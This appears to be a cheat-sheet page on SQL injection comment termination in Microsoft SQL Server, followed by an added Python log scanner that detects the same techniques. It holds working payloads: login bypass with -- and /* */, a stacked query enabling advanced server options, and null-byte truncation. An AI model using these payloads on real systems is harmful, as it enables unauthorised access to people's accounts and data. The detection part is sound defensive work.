Comment Out Query
In SQL injection attacks, commenting out the remainder of a query is often necessary to ensure that the injection payload works correctly without syntax errors. This technique is commonly known as “comment termination.”
In Microsoft SQL Server (MSSQL), you can use the following methods to comment out the rest of a query:
| Comment Type | Syntax | Description |
|---|---|---|
| Single-line comment | -- | Requires a space after the dashes |
| Inline/block comment | /*...*/ | Can span multiple lines |
| Batch separator | ; | Terminates the current statement |
| Nullbyte | %00 | Application-layer string truncation (see notes) |
Examples

```sql
-- Example 1: Using -- to comment out the rest of the query
SELECT * FROM Users WHERE username = 'admin'-- ' AND password = 'password'

-- Example 2: Using /* */ for inline commenting
SELECT * FROM Users WHERE username = 'admin'/* ' AND password = 'password' */

-- Example 3: Using ; to terminate and start a new query
SELECT * FROM Users WHERE username = 'admin'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
```
Example 4: Null byte truncation (application-layer, not SQL Server)

The %00 null byte is not a SQL Server comment — it exploits C-style string handling in certain application frameworks/drivers that treat null bytes as string terminators.

```
-- Attacker input (URL-encoded):
username=admin'%00&password=anything
-- Application receives and URL-decodes to:
admin'\0   (where \0 is the null byte)
-- Query string as the application builds it:
SELECT * FROM Users WHERE username = 'admin'\0' AND password = '...'
--                                           ^ string truncated here
-- If the framework/driver truncates at the null byte, SQL Server receives:
SELECT * FROM Users WHERE username = 'admin'
```

This technique only works in specific environments (classic ASP, older PHP configurations, certain ODBC drivers). Modern frameworks typically pass the null byte through or reject it. See the last note below for details.
Notes

- MSSQL requires a space or new line after the `--` comment syntax.
- In some cases, MSSQL ignores comment syntax in strings, so ensure that your injection point has proper quoting.
- Using the `;` batch separator can be particularly powerful as it allows execution of additional SQL statements.
- When using batch separators, be aware that permissions and error handling may differ from the original query.
- The null byte (`%00`) is not recognized by SQL Server itself — it works by truncating the string at the application layer before the query reaches the database. This behavior depends on the web framework/driver (e.g., classic ASP, certain PHP configurations) and may not work in modern stacks.
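As an added defensive example (not part of the original page), the following Python scans URL-decoded request parameters for the four terminators in the table and examples above, so that a log review flags each technique by name; the log line format and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# One pattern per comment-termination technique from the table above.
# Each looks for a closing quote followed by the terminator, which is the
# shape of every example on this page; a lone "--" or ";" in free text
# (an O'Brien-style apostrophe, a dash in a comment field) is not flagged.
PATTERNS = {
    "single-line comment": re.compile(r"'\s*--"),
    "block comment":       re.compile(r"'\s*/\*"),
    "batch separator":     re.compile(r"'\s*;"),
    "null byte":           re.compile(r"\x00"),   # %00 once URL-decoded
}

def decode_query(query_string):
    """Split on '&' and URL-decode each name and value (a list per name,
    since a parameter may repeat). Done by hand rather than with parse_qs
    so that ';' is never treated as a pair separator."""
    params = {}
    for pair in query_string.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params

def find_comment_termination(query_string):
    """Return [(parameter, technique), ...] for every decoded value that
    matches. Decoding first matters: the raw log line carries '%27' and
    '%00', not a quote and a NUL, so matching on the raw line misses both."""
    hits = []
    for name, values in decode_query(query_string).items():
        for value in values:
            for technique, pattern in PATTERNS.items():
                if pattern.search(value):
                    hits.append((name, technique))
    return hits

def scan_log(lines):
    """Map each constructed log line ("<ip> <path>?<query>") to its hits."""
    report = {}
    for line in lines:
        _, _, request = line.partition(" ")
        _, _, query_string = request.partition("?")
        report[line] = find_comment_termination(query_string)
    return report

# Constructed sample log lines (not real traffic); payloads mirror examples 1-4.
SAMPLE_LOG = [
    "10.0.0.5 /login?username=admin&password=hunter2",
    "10.0.0.5 /login?username=O%27Brien&password=pass--word",
    "10.0.0.9 /login?username=admin%27--&password=x",
    "10.0.0.9 /login?username=admin%27/*&password=x",
    "10.0.0.9 /login?username=admin%27;%20SELECT%201&password=x",
    "10.0.0.9 /login?username=admin%27%00&password=anything",
]
```

The null-byte check fires on the decoded NUL whether or not the downstream driver would truncate on it, which is the right bias for a detection rule: the note above says truncation depends on the stack, and the request is suspicious either way.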